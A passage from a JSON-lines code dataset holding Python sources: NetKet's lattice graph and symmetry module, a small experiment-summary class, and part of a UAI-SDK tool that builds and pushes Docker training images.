best_found\n","sub_path":"test/test_mirage/test_util/test_region.py","file_name":"test_region.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"604321964","text":"# Copyright 2020, 2021 The NetKet Authors - All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom dataclasses import dataclass\nimport itertools\nfrom itertools import product\nfrom math import pi\nfrom netket.utils.types import Array\nfrom typing import Dict, Sequence, Tuple, Union, Optional\nimport warnings\n\nimport networkx as _nx\nimport numpy as _np\nfrom scipy.spatial import cKDTree\nfrom scipy.sparse import find, triu\n\nfrom netket.utils.deprecation import deprecated as _deprecated, warn_deprecation\nfrom netket.utils.semigroup import Identity, Element, PermutationGroup\nfrom netket.utils import HashableArray\n\nfrom .graph import NetworkX\n\ntol_digits = 5\ncutoff_tol = _np.power(10.0, -tol_digits)\n\"\"\"Tolerance for the maximum distance cutoff when computing the sparse distance matrix.\nThis is necessary because of floating-point errors when computing the distance in non-trivial\nlattices.\n\"\"\"\n\nPositionT = _np.ndarray\nCoordT = _np.ndarray\n\n\n@dataclass(frozen=True)\nclass Translation(Element):\n perms: Tuple[Tuple[int]]\n shift: Tuple[int]\n\n def __call__(self, sites):\n for i, dim in enumerate(self.shift):\n perm = self.perms[i]\n for j in range(dim):\n sites = _np.take(sites, perm)\n\n return sites\n\n def __repr__(self):\n return f\"T{self.shift}\"\n\n\n@dataclass(frozen=True)\nclass PlanarRotation(Element):\n perm: Tuple[int]\n num_rots: int\n\n def __call__(self, sites):\n for i in range(self.num_rots):\n sites = _np.take(sites, self.perm)\n\n return sites\n\n def __repr__(self):\n return f\"Rot{self.num_rots}\"\n\n\n@dataclass(frozen=True)\nclass Reflection(Element):\n\n perm: Tuple[int]\n\n def __call__(self, sites):\n sites = _np.take(sites, self.perm)\n\n return sites\n\n def __repr__(self):\n return f\"Ref\"\n\n\ndef get_edges(atoms_positions, cutoff, distance_atol=cutoff_tol):\n cutoff = cutoff + distance_atol\n kdtree = cKDTree(atoms_positions)\n dist_matrix = kdtree.sparse_distance_matrix(kdtree, cutoff)\n id1, id2, values = find(triu(dist_matrix))\n pairs = []\n min_dists = {} # keys are nodes, values are min dists\n for node in _np.unique(_np.concatenate((id1, id2))):\n min_dist = _np.min(values[(id1 == node) | (id2 == node)])\n min_dists[node] = min_dist\n for node in _np.unique(id1):\n min_dist = _np.min(values[id1 == node])\n mask = (id1 == node) & (_np.isclose(values, min_dist))\n first = id1[mask]\n second = id2[mask]\n for pair in zip(first, second):\n if _np.isclose(min_dist, min_dists[pair[0]]) and _np.isclose(\n min_dist, min_dists[pair[1]]\n ):\n pairs.append(pair)\n return pairs\n\n\n@dataclass\nclass LatticeSite:\n \"\"\"\n Contains information about a single :class:`~netket.graph.Lattice` site.\n \"\"\"\n\n id: int\n \"\"\"Integer ID of this site\"\"\"\n position: PositionT\n \"\"\"Real-space position of this site\"\"\"\n cell_coord: CoordT\n \"\"\"basis coordinates of this site\"\"\"\n\n def __repr__(self):\n s = \", \".join(map(str, (self.id, self.cell_coord)))\n return f\"LatticeSite({s})\"\n\n\ndef create_sites(\n basis_vectors, extent, apositions, pbc\n) -> Tuple[Tuple[LatticeSite, bool], Dict[HashableArray, int]]:\n shell_vec = _np.zeros(extent.size, dtype=int)\n shift_vec = _np.zeros(extent.size, dtype=int)\n # note: by modifying these, the number of shells can be tuned.\n shell_vec[pbc] = 2\n shift_vec[pbc] = 1\n ranges = tuple([list(range(ex)) for ex in extent + shell_vec])\n sites = []\n cell_coord_to_site = {}\n for s_cell in itertools.product(*ranges):\n s_coord_cell = _np.asarray(s_cell) - shift_vec\n inside = not (_np.any(s_coord_cell < 0) or _np.any(s_coord_cell > (extent - 1)))\n atom_count = len(sites)\n for i, atom_coord in enumerate(apositions):\n s_coord_site = s_coord_cell + atom_coord\n r_coord_site = _np.matmul(basis_vectors.T, s_coord_site)\n cell_coord_site = _np.array((*s_coord_cell, i), dtype=int)\n sites.append(\n (\n LatticeSite(\n id=None, # to be set later, after sorting all sites\n position=r_coord_site,\n cell_coord=cell_coord_site,\n ),\n inside,\n ),\n )\n cell_coord_to_site[HashableArray(cell_coord_site)] = atom_count + i\n return sites, cell_coord_to_site\n\n\ndef get_true_edges(\n basis_vectors: PositionT,\n sites: Sequence[LatticeSite],\n cell_coord_to_site,\n extent,\n distance_atol=cutoff_tol,\n):\n positions = _np.array([p.position for p, _ in sites])\n naive_edges = get_edges(\n positions, _np.linalg.norm(basis_vectors, axis=1).max(), distance_atol\n )\n true_edges = []\n for node1, node2 in naive_edges:\n site1, inside1 = sites[node1]\n site2, inside2 = sites[node2]\n if inside1 and inside2:\n true_edges.append((node1, node2))\n elif inside1 or inside2:\n cell1 = site1.cell_coord\n cell2 = site2.cell_coord\n cell1[:-1] = cell1[:-1] % extent\n cell2[:-1] = cell2[:-1] % extent\n node1 = cell_coord_to_site[HashableArray(cell1)]\n node2 = cell_coord_to_site[HashableArray(cell2)]\n edge = (node1, node2)\n if edge not in true_edges and (node2, node1) not in true_edges:\n true_edges.append(edge)\n return true_edges\n\n\ndef deprecated(alternative):\n def wrapper(fn):\n msg = (\n f\"{fn.__name__} is deprecated and may be removed in the future. \"\n f\"You can use `{alternative}`` instead.\"\n )\n f = _deprecated(msg)(fn)\n return f\n\n return wrapper\n\n\nREPR_TEMPLATE = \"\"\"Lattice(\n n_nodes={},\n extent={},\n basis_vectors=\n {},\n site_offsets=\n {},\n)\n\"\"\"\n\n\nclass Lattice(NetworkX):\n r\"\"\"\n A lattice built by periodic arrangement of a given unit cell.\n\n The lattice is represented as a Bravais lattice with (:code:`basis_vectors`)\n :math:`\\{a_d\\}_{d=1}^D` (where :math:`D = \\mathtt{ndim}` is the dimension of the lattice)\n and a unit cell consisting of one or more sites,\n The positions of those sites within the unit cell can be specified by the :code:`site_offsets`\n parameter. The :code:`extent` is a array where :code:`extent[d]` specifies the number of\n times each unit cell is translated along direction :math:`d`.\n The full lattice is then generated by placing a site at each of the points\n\n .. math::\n\n R_{rq} = \\sum_{d=1}^D r_d a_d + b_q \\in \\mathbb R^D\n\n where :math:`r_d \\in \\{1, \\ldots, \\mathtt{extent}[d]\\}` and :math:`b_q = \\mathtt{site\\_offsets}[q]`.\n We also refer to :math:`q` as the `label` of the site within the unit cell.\n\n The lattice class supports three ways of addressing a specific lattice site:\n\n id\n An integer index that is used to identify the site in :code:`self.edges()` and\n also corresponds to the index of the corresponding site in sequences like\n :code:`self.nodes()`, :code:`self.positions` or :code:`self.basis_coords`.\n\n positions\n Real-space position vector :math:`R_{rq}` as defined above, which is available from\n :func:`~netket.graph.Lattice.positions` and can be resolved into an id via\n :func:`~netket.graph.Lattice.id_from_position`.\n\n basis coordinates\n where each site is specified by a vector :code:`[r1, ..., rD, q]`\n with :math:`r` being the integer vector of length :code:`ndim` specifying the\n cell position as multiples of the primitive vectors and the site label :math:`q`\n giving the number of the site within the unit cell.\n Basis coordinates are available from :func:`~netket.graph.Lattice.basis_coords` and\n can be resolved into an id via :func:`~netket.graph.Lattice.id_from_basis_coords`.\n \"\"\"\n # Initialization\n # ------------------------------------------------------------------------\n def __init__(\n self,\n basis_vectors: _np.ndarray,\n extent: _np.ndarray,\n *,\n pbc: Union[bool, Sequence[bool]] = True,\n site_offsets: Optional[_np.ndarray] = None,\n atoms_coord: Optional[_np.ndarray] = None,\n distance_atol: float = 1e-5,\n ):\n \"\"\"\n Constructs a new ``Lattice`` given its side length and the features of the unit cell.\n\n Args:\n basis_vectors: The basis vectors of the lattice. Should be an array\n of shape `(ndim, ndim)` where each `row` is a basis vector.\n extent: The number of copies of the unit cell; needs to be an array\n of length `ndim`.\n pbc: If ``True`` then the constructed lattice\n will have periodic boundary conditions, otherwise\n open boundary conditions are imposed (default=`True`).\n site_offsets: The position offsets of sites in the unit cell (one site at the origin by default).\n distance_atol: Distance below which spatial points are considered equal for the purpose\n of identifying nearest neighbors.\n\n Examples:\n Constructs a Kagome lattice with 3 × 3 unit cells:\n\n >>> import numpy as np\n >>> from netket.graph import Lattice\n >>> # Hexagonal lattice basis\n >>> sqrt3 = np.sqrt(3.0)\n >>> basis = np.array([\n ... [1.0, 0.0],\n ... [0.5, sqrt3 / 2.0],\n ... ])\n >>> # Kagome unit cell\n >>> cell = np.array([\n ... basis[0] / 2.0,\n ... basis[1] / 2.0,\n ... (basis[0]+basis[1])/2.0\n ... ])\n >>> g = Lattice(basis_vectors=basis, site_offsets=cell, extent=[3, 3])\n >>> print(g.n_nodes)\n 27\n >>> print(g.basis_coords[:6])\n [[0 0 0]\n [0 0 1]\n [0 0 2]\n [0 1 0]\n [0 1 1]\n [0 1 2]]\n >>> print(g.positions[:6])\n [[0.5 0. ]\n [0.25 0.4330127 ]\n [0.75 0.4330127 ]\n [1. 0.8660254 ]\n [0.75 1.29903811]\n [1.25 1.29903811]]\n \"\"\"\n\n self._basis_vectors = self._clean_basis(basis_vectors)\n self._ndim = self._basis_vectors.shape[1]\n\n self._site_offsets, site_pos_fractional = self._clean_site_offsets(\n site_offsets,\n atoms_coord,\n self._basis_vectors,\n )\n self._pbc = self._clean_pbc(pbc, self._ndim)\n\n self._extent = _np.asarray(extent, dtype=int)\n\n sites, self._basis_coord_to_site = create_sites(\n self._basis_vectors, self._extent, site_pos_fractional, pbc\n )\n edges = get_true_edges(\n self._basis_vectors,\n sites,\n self._basis_coord_to_site,\n self._extent,\n distance_atol,\n )\n graph = _nx.MultiGraph(edges)\n\n # Rename sites\n old_nodes = sorted(set(node for edge in edges for node in edge))\n self._sites = []\n for i, (site, _) in enumerate(sites[old_node] for old_node in old_nodes):\n site.id = i\n self._sites.append(site)\n new_nodes = {old_node: new_node for new_node, old_node in enumerate(old_nodes)}\n graph = _nx.relabel_nodes(graph, new_nodes)\n self._basis_coord_to_site = {\n HashableArray(p.cell_coord): p.id for p in self._sites\n }\n self._positions = _np.array([p.position for p in self._sites])\n self._basis_coords = _np.array([p.cell_coord for p in self._sites])\n\n # Order node names\n edges = list(graph.edges())\n graph = _nx.MultiGraph()\n graph.add_nodes_from([p.id for p in self._sites])\n graph.add_edges_from(edges)\n\n lattice_dims = _np.expand_dims(self._extent, 1) * self.basis_vectors\n self._inv_dims = _np.linalg.inv(lattice_dims)\n int_positions = self._to_integer_position(self._positions)\n self._int_position_to_site = {\n HashableArray(pos): index for index, pos in enumerate(int_positions)\n }\n\n super().__init__(graph)\n\n @staticmethod\n def _clean_basis(basis_vectors):\n \"\"\"Check and convert `basis_vectors` init argument.\"\"\"\n basis_vectors = _np.asarray(basis_vectors)\n if basis_vectors.ndim != 2:\n raise ValueError(\n \"'basis_vectors' must have ndim==2 (as array of primtive vectors)\"\n )\n if basis_vectors.shape[0] != basis_vectors.shape[1]:\n raise ValueError(\"The number of primitive vectors must match their length\")\n return basis_vectors\n\n @staticmethod\n def _clean_site_offsets(site_offsets, atoms_coord, basis_vectors):\n \"\"\"Check and convert `site_offsets` init argument.\"\"\"\n if atoms_coord is not None and site_offsets is not None:\n raise ValueError(\n \"atoms_coord is deprecated and replaced by site_offsets, \"\n \"so both cannot be specified at the same time.\"\n )\n if atoms_coord is not None:\n warnings.warn(\n \"atoms_coord is deprecated and may be removed in future versions, \"\n \"please use site_offsets instead\",\n FutureWarning,\n )\n site_offsets = atoms_coord\n\n if site_offsets is None:\n site_offsets = _np.zeros(basis_vectors.shape[0])[None, :]\n\n site_offsets = _np.asarray(site_offsets)\n site_pos_fractional = _np.asarray(\n [\n _np.matmul(_np.linalg.inv(basis_vectors.T), atom_coord)\n for atom_coord in site_offsets\n ]\n )\n if (\n site_pos_fractional.min() < -cutoff_tol\n or site_pos_fractional.max() > 1 + cutoff_tol\n ):\n raise ValueError(\n \"site_offsets positions must be contained inside the primitive cell\"\n )\n uniques = _np.unique(site_offsets, axis=0)\n if len(site_offsets) != uniques.shape[0]:\n site_offsets = _np.asarray(uniques)\n warnings.warn(\n \"Some atom positions are not unique. Duplicates were dropped, and \"\n f\"now atom positions are {site_offsets}\",\n UserWarning,\n )\n return site_offsets, site_pos_fractional\n\n @staticmethod\n def _clean_pbc(pbc, ndim):\n \"\"\"Check and convert `pbc` init argument.\"\"\"\n if isinstance(pbc, bool):\n return _np.array([pbc] * ndim, dtype=bool)\n elif (\n not isinstance(pbc, Sequence)\n or len(pbc) != ndim\n or not all(isinstance(b, bool) for b in pbc)\n ):\n raise ValueError(\n \"pbc must be either a boolean or a sequence of booleans with length equal to \"\n \"the lattice dimenion\"\n )\n else:\n return _np.asarray(pbc, dtype=bool)\n\n # Properties\n # ------------------------------------------------------------------------\n @property\n def basis_vectors(self):\n \"\"\"Basis vectors of the lattice\"\"\"\n return self._basis_vectors\n\n @property\n def site_offsets(self):\n \"\"\"Position offsets of sites in the unit cell\"\"\"\n return self._site_offsets\n\n @property\n def ndim(self):\n \"\"\"Dimension of the lattice\"\"\"\n return self._ndim\n\n @property\n def pbc(self):\n \"\"\"\n Array of bools such that `pbc[d]` indicates whether dimension d has\n periodic boundaries.\n \"\"\"\n return self._pbc\n\n @property\n def extent(self):\n \"\"\"\n Extent of the lattice\n \"\"\"\n return self._extent\n\n @property\n def sites(self) -> Sequence[LatticeSite]:\n \"\"\"Sequence of lattice site objects\"\"\"\n return self._sites\n\n @property\n def positions(self) -> PositionT:\n \"\"\"Real-space positions of all lattice sites\"\"\"\n return self._positions\n\n @property\n def basis_coords(self) -> CoordT:\n \"\"\"basis coordinates of all lattice sites\"\"\"\n return self._basis_coords\n\n # Site lookup\n # ------------------------------------------------------------------------\n def _to_integer_position(self, positions: PositionT) -> Array:\n frac_positions = _np.matmul(positions, self._inv_dims) % 1\n return _np.around(frac_positions * 10 ** tol_digits).astype(int) % (\n 10 ** tol_digits\n )\n\n @staticmethod\n def _get_id_from_dict(\n dict: Dict[HashableArray, int], key: Array\n ) -> Union[int, Array]:\n if key.ndim == 1:\n return dict.get(HashableArray(key), None)\n elif key.ndim == 2:\n return _np.array([dict.get(HashableArray(k), None) for k in key])\n else:\n raise ValueError(\"Input needs to be rank 1 or rank 2 array\")\n\n def id_from_position(self, position: PositionT) -> Union[int, Array]:\n \"\"\"\n Return the id for a site at the given position. When passed a rank-2 array\n where each row is a position, this method returns an array of the corresponding ids.\n In both cases, None is returned for positions that do not correspond to a site.\n \"\"\"\n int_pos = self._to_integer_position(position)\n return self._get_id_from_dict(self._int_position_to_site, int_pos)\n\n def id_from_basis_coords(self, basis_coords: CoordT) -> Union[int, Array]:\n \"\"\"\n Return the id for a site at the given basis coordinates. When passed a rank-2 array\n where each row is a coordinate vector, this method returns an array of the corresponding\n ids. In both cases, None is returned for coords that do not correspond to a site.\n \"\"\"\n key = _np.asarray(basis_coords)\n return self._get_id_from_dict(self._basis_coord_to_site, key)\n\n def position_from_basis_coords(self, basis_coords: CoordT) -> PositionT:\n \"\"\"\n Return the position of the site with given basis coordinates.\n When passed a rank-2 array where each row is a coordinate vector,\n this method returns an array of the corresponding positions.\n Throws a KeyError if no site is found for any of the coordinates.\n \"\"\"\n ids = self.id_from_basis_coords(basis_coords)\n if _np.any(ids == None): # pylint: disable=singleton-comparison\n raise KeyError(f\"No site found at at least one of {basis_coords}\")\n return self.positions[ids]\n\n # Output and drawing\n # ------------------------------------------------------------------------\n def __repr__(self) -> str:\n return REPR_TEMPLATE.format(\n self.n_nodes,\n self._extent,\n str(self.basis_vectors).replace(\"\\n\", \"\\n\" + \" \" * 8),\n str(self.site_offsets).replace(\"\\n\", \"\\n\" + \" \" * 8),\n )\n\n def draw(\n self,\n ax=None,\n figsize: Optional[Tuple[Union[int, float]]] = None,\n node_color: str = \"#1f78b4\",\n node_size: int = 300,\n edge_color: str = \"k\",\n curvature: float = 0.2,\n font_size: int = 12,\n font_color: str = \"k\",\n ):\n \"\"\"\n Draws the ``Lattice`` graph\n\n Args:\n ax: Matplotlib axis object.\n figsize: (width, height) tuple of the generated figure.\n node_color: String with the colour of the nodes.\n node_size: Area of the nodes (as in matplotlib.pyplot.scatter).\n edge_color: String with the colour of the edges.\n curvature: A Bezier curve is fit, where the \"height\" of the curve is `curvature`\n times the \"length\" of the curvature.\n font_size: fontsize of the labels for each node.\n font_color: Colour of the font used to label nodes.\n\n Returns:\n Matplotlib axis object containing the graph's drawing.\n \"\"\"\n import matplotlib.pyplot as plt # pylint: disable=import-outside-toplevel\n\n # Check if lattice is 1D or 2D... or notnetketwarnings.py\n if self._ndim == 1:\n positions = _np.pad(self.positions, (0, 1), \"constant\")\n elif self._ndim == 2:\n positions = self.positions\n else:\n raise ValueError(\n f\"Make sure that the graph is 1D or 2D in order to be drawn. Now it is {self._ndim}D\"\n )\n if ax is None:\n _, ax = plt.subplots(figsize=figsize)\n\n # FIXME (future) as of 11Apr2021, networkx can draw curved\n # edges only for directed graphs.\n _nx.draw_networkx_edges(\n self.graph.to_directed(),\n pos=positions,\n edgelist=self.edges(),\n connectionstyle=f\"arc3,rad={curvature}\",\n ax=ax,\n arrowsize=0.1,\n edge_color=edge_color,\n node_size=node_size,\n )\n _nx.draw_networkx_nodes(\n self.graph, pos=positions, ax=ax, node_color=node_color, node_size=node_size\n )\n _nx.draw_networkx_labels(\n self.graph, pos=positions, ax=ax, font_size=font_size, font_color=font_color\n )\n ax.axis(\"equal\")\n return ax\n\n # Backwards compatibility\n # ------------------------------------------------------------------------\n @deprecated(\"basis_coords[site_id, -1]\")\n def atom_label(self, site_id: int) -> int:\n \"\"\"`Deprecated`, please use :code:`basis_coords[site_id, -1]` instead.\"\"\"\n return self.basis_coords[site_id, -1]\n\n @deprecated(\"basis_coords[site_id, :-1]\")\n def site_to_vector(self, site_id: int) -> CoordT:\n \"\"\"`Deprecated`, please use :code:`basis_coords[site_id, :-1]` instead.\"\"\"\n return self.basis_coords[site_id, :-1]\n\n @deprecated(\"positions[site_id]\")\n def site_to_coord(self, site_id: int) -> PositionT:\n \"\"\"`Deprecated`, please use :code:`positions[site_id]` instead.\"\"\"\n return self.positions[site_id]\n\n @deprecated(\"id_from_basis_coords([*vector, 0])\")\n def vector_to_site(self, vector: CoordT) -> int:\n \"\"\"`Deprecated`, please use :code:`id_from_basis_coords([*vector, 0])` instead.\"\"\"\n # Note: This only gives one site within the unit cell, so that\n # `vector_to_site(site_to_vector(i)) == i` is _not_ true in general,\n # which is consistent with the behavior of the v2 lattice.\n return self.id_from_basis_coords([*vector, 0])\n\n @deprecated(\"position_from_basis_coords([*vector, label])\")\n def vector_to_coord(self, vector: CoordT, label: int) -> PositionT:\n \"\"\"`Deprecated`, please use :code:`position_from_basis_coords([*vector, label])` instead.\"\"\"\n return self.position_from_basis_coords([*vector, label])\n\n @property\n @deprecated(\"positions\")\n def coordinates(self) -> PositionT:\n \"\"\"`Deprecated`, please use :code:`positions` instead.\"\"\"\n return self.positions\n\n @property\n @deprecated(\"site_offsets\")\n def atoms_coord(self) -> PositionT:\n \"\"\"`Deprecated`, please use :code:`site_offsets` instead.\"\"\"\n return self._site_offsets\n\n # Symmetries\n # ------------------------------------------------------------------------\n def _get_id_or_raise(self, pos: PositionT) -> Union[int, Array]:\n ids = self.id_from_position(pos)\n if _np.any(ids == None): # pylint: disable=singleton-comparison\n raise KeyError(f\"No site found at at least one of {pos}\")\n return ids\n\n def translation_perm(self):\n perms = []\n for vec in self.basis_vectors:\n perm = []\n for position in self._positions:\n position = position.copy() + vec\n perm.append(self._get_id_or_raise(position))\n\n perms.append(tuple(perm))\n return tuple(perms)\n\n def rotation_perm(self, period, axes=[0, 1]):\n perm = []\n axes = list(axes)\n angle = 2 * pi / period\n rot_mat = _np.array(\n [[_np.cos(angle), -_np.sin(angle)], [_np.sin(angle), _np.cos(angle)]]\n )\n\n rpositions = self._positions.copy()\n rpositions[:, axes] = _np.matmul(rpositions[:, axes], rot_mat)\n\n for position in rpositions:\n try:\n perm.append(self._get_id_or_raise(position))\n except KeyError as e:\n raise ValueError(\n \"Rotation with the specified period and axes does not map lattice to itself\"\n ) from e\n\n return tuple(perm)\n\n def reflection_perm(self, axis=0):\n perm = []\n rpositions = self._positions.copy()\n rpositions[:, axis] = -1 * rpositions[:, axis]\n\n for position in rpositions:\n try:\n perm.append(self._get_id_or_raise(position))\n except KeyError as e:\n raise ValueError(\n \"Reflection about specified axis does not map lattice to itself\"\n ) from e\n\n return tuple(perm)\n\n def planar_rotations(self, period, axes=[0, 1]) -> PermutationGroup:\n \"\"\"\n Returns PermutationGroup corresponding to rotations about specfied axes with specified period\n\n Arguments:\n period: Period of the rotations\n axes: Axes that define the plane of the rotation\n \"\"\"\n\n perm = self.rotation_perm(period, axes)\n rotations = [PlanarRotation(perm, n) for n in range(1, period)]\n\n return PermutationGroup([Identity()] + rotations, degree=self.n_nodes)\n\n def basis_translations(self) -> PermutationGroup:\n \"\"\"\n Returns PermutationGroup corresponding to translations by site_offsets vectors\n \"\"\"\n\n translations = product(*[range(i) for i in self._extent])\n next(translations)\n\n perms = self.translation_perm()\n translations = [Translation(perms, i) for i in translations]\n\n return PermutationGroup([Identity()] + translations, degree=self.n_nodes)\n\n def reflections(self, axis=0) -> PermutationGroup:\n \"\"\"\n Returns PermutationGroup corresponding to reflection about axis\n args:\n axis: Generated reflections about specified axis\n \"\"\"\n perm = self.reflection_perm(axis)\n\n return PermutationGroup([Identity()] + [Reflection(perm)], degree=self.n_nodes)\n","sub_path":"netket/graph/lattice.py","file_name":"lattice.py","file_ext":"py","file_size_in_byte":27066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"376395600","text":"class ExperimentSummaryTask:\n def __init__(self, assemble_config, learn_config, created_ts):\n self.assemble_config = assemble_config\n self.learn_config = learn_config\n self.created_ts = created_ts\n self.assemble_result = None\n self.learn_result = None\n\n @classmethod\n def from_es_data(cls, task):\n res = cls(\n assemble_config=task['assemble_config'],\n learn_config=task['learn_config'],\n created_ts=task['created_ts'],\n )\n res.assemble_result = task['assemble_result']\n res.learn_result = task['learn_result']\n return res\n\n def add_assemble_result(self, result_file_path):\n if result_file_path:\n self.assemble_result = result_file_path\n\n return {\n \"assemble_result\": self.assemble_result\n }\n\n def add_learn_result(self, result):\n if result:\n self.learn_result = result\n\n return {\n \"learn_result\": self.learn_result\n }\n","sub_path":"DWF-server/model/experiment_summary_task.py","file_name":"experiment_summary_task.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439962392","text":"# Copyright 2017 The UAI-SDK Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport os \nimport sys\nimport json\nimport argparse\nimport tarfile\nimport subprocess\nfrom datetime import datetime\nfrom uai.utils.logger import uai_logger\nfrom uaitrain.cmd.base_cmd import UaiCmdTool\n\n\n#DOCKER_REGISTRY = \"uhub.service.ucloud.cn\"\nDOCKER_REGISTRY = \"uhub.ucloud.cn\"\nDOCKER_TAG_SUFFIX = \"uaitrain\"\nTMP_CPU_DOCKER_FILE = \"uaitrain-cpu.Dockerfile\"\nTMP_DOCKER_FILE = \"uaitrain.Dockerfile\"\nDOCKER_RUN_CMD_FILE = \"uaitrain_cmd.txt\"\n\nclass UaiPackTool(object):\n \"\"\" The Base Pack Tool Class with UAI\n \"\"\"\n def __init__(self, platform, parser):\n self.platform = platform\n self.parser = parser\n\n self.conf_params = {}\n \n self._add_args()\n\n def _add_args(self):\n \"\"\" AI Arch Specific Pack Tool should implement its own _add_args\n \"\"\"\n raise UserWarning(\"UaiPackTool._add_args Unimplemented\")\n\n def _analysis_args(self):\n self.config.load_params()\n if self.config.params.has_key(\"ai_arch_v\"):\n if self.platform != self.config.params[\"ai_arch_v\"].lower().split('-')[0]:\n raise RuntimeError(\"ai_arch_v should be one version of \" + self.platform)\n if self.config.params.has_key(\"accelerator\"):\n self.accelerator = self.config.params[\"accelerator\"]\n\n def _load_args(self):\n \"\"\" AI Arch Specific Pack Tool should implement its own _load_args\n \"\"\"\n raise UserWarning(\"UaiPackTool._load_args Unimplemented\")\n\n def _translate_args(self, params):\n # self.translateTool = UaiCmdTool(argparse.ArgumentParser())\n # sys.argv = ['any', 'translate']\n # for k in self.params.keys():\n # if k=='public_key' or k== 'private_key' \\\n # or k == 'os' or k =='language' or k=='ai_arch_v' or k=='os_deps' or k=='pip':\n # if self.params[k]:\n # sys.argv.append('--' + k)\n # sys.argv.append(self.params[k])\n # self.translateTool._load_args()\n self.translateTool = UaiCmdTool(self.parser)\n self.translateTool.conf_params = params\n self.translateTool.translate_pkg_params()\n\n def _get_baseimage(self):\n self.baseimageTool = UaiCmdTool(self.parser)\n\n #get gpu image\n self._translate_args(self.config.params)\n self.baseimageTool.conf_params['baseimage'] = self.baseimageTool.get_base_image(self.translateTool.conf_params)\n\n #get cpu image\n self.config.params[\"accelerator\"] = \"cpu\"\n self._translate_args(self.config.params)\n self.baseimageTool.conf_params['cpuimage'] = self.baseimageTool.get_base_image(self.translateTool.conf_params)\n\n def _bulid_userimage(self):\n uai_logger.info(\"Docker login on \" + DOCKER_REGISTRY)\n retcode = subprocess.check_call([\"docker\", \"login\", \"-u\", self.baseimageTool.conf_params[\"uhub_username\"], \"-p\", self.baseimageTool.conf_params[\"uhub_password\"], DOCKER_REGISTRY],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n\n '''\n Build cpu image for local training\n '''\n uai_logger.info(\"Pull base image from \" + DOCKER_REGISTRY)\n retcode = subprocess.check_call([\"docker\", \"pull\", self.baseimageTool.conf_params[\"cpuimage\"]],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n\n uai_logger.info(\"Create CPU Dockerfile\")\n dockerbuf = []\n dockerbuf.append(\"From \" + self.baseimageTool.conf_params[\"cpuimage\"] + \"\\n\")\n dockerbuf.append(\"ADD \" + \"./\" + self.baseimageTool.conf_params[\"code_path\"] + \" /data/\\n\")\n with open(TMP_CPU_DOCKER_FILE, 'w') as f:\n f.write(''.join(dockerbuf))\n\n uai_logger.info(\"Build CPU user image\")\n userimage = self.baseimageTool.conf_params[\"uhub_imagename\"] + \"-cpu\"\n if self.baseimageTool.conf_params[\"uhub_imagetag\"]:\n userimage = userimage + \":\" + self.baseimageTool.conf_params[\"uhub_imagetag\"] + \"_\" + DOCKER_TAG_SUFFIX\n else:\n userimage = userimage + \":\" + DOCKER_TAG_SUFFIX\n retcode = subprocess.check_call([\"docker\", \"build\", \"-t\", userimage, \"-f\", TMP_CPU_DOCKER_FILE, \".\"],\n stderr=subprocess.STDOUT)\n self.usercpuimage = userimage\n\n '''\n Build actual image for training\n '''\n uai_logger.info(\"Build user image\")\n uai_logger.info(\"Pull base image from \" + DOCKER_REGISTRY)\n retcode = subprocess.check_call([\"docker\", \"pull\", self.baseimageTool.conf_params[\"baseimage\"]],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n\n uai_logger.info(\"Create Dockerfile\")\n dockerbuf = []\n dockerbuf.append(\"From \" + self.baseimageTool.conf_params[\"baseimage\"] + \"\\n\")\n dockerbuf.append(\"ADD \" + \"./\" + self.baseimageTool.conf_params[\"code_path\"] + \" /data/\\n\")\n with open(TMP_DOCKER_FILE, 'w') as f:\n f.write(''.join(dockerbuf))\n\n uai_logger.info(\"Build user image\")\n userimage = DOCKER_REGISTRY + \"/\" + self.baseimageTool.conf_params[\"uhub_registry\"] + \"/\" + \\\n self.baseimageTool.conf_params[\"uhub_imagename\"]\n if self.baseimageTool.conf_params[\"uhub_imagetag\"]:\n userimage = userimage + \":\" + self.baseimageTool.conf_params[\"uhub_imagetag\"] + \"_\" + DOCKER_TAG_SUFFIX\n else:\n userimage = userimage + \":\" + DOCKER_TAG_SUFFIX\n retcode = subprocess.check_call([\"docker\", \"build\", \"-t\", userimage, \"-f\", TMP_DOCKER_FILE, \".\"],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n self.userimage = userimage\n\n\n def _push_userimage(self):\n uai_logger.info(\"Push user image\")\n retcode = subprocess.check_call([\"docker\", \"push\", self.userimage],\n stderr=subprocess.STDOUT)\n if retcode != 0: return\n\n def _gen_run_cmd(self):\n uai_logger.info(\"Generate run cmd\")\n\n pycmd = \"/data/\" + \\\n self.baseimageTool.conf_params[\"mainfile_path\"] + \" \" + \\\n self.baseimageTool.conf_params[\"train_params\"]\n cpudockercmd = \"sudo docker run -it -v \" + \\\n self.baseimageTool.conf_params[\"test_data_path\"] + \":\" + \"/data/data \" + \\\n \"-v \" + self.baseimageTool.conf_params[\"test_output_path\"] + \":\" + \"/data/output \" + \\\n self.usercpuimage + \" \" + \"/bin/bash -c \" + \\\n \"\\\"cd /data && /usr/bin/python \" + pycmd + \" \" + \"--work_dir=/data --data_dir=/data/data --output_dir=/data/output --log_dir=/data/output/log\\\"\"\n f = open(DOCKER_RUN_CMD_FILE, \"w\")\n f.write(\"CMD Used for deploying: \" + pycmd + \"\\n\")\n f.write(\"CMD for 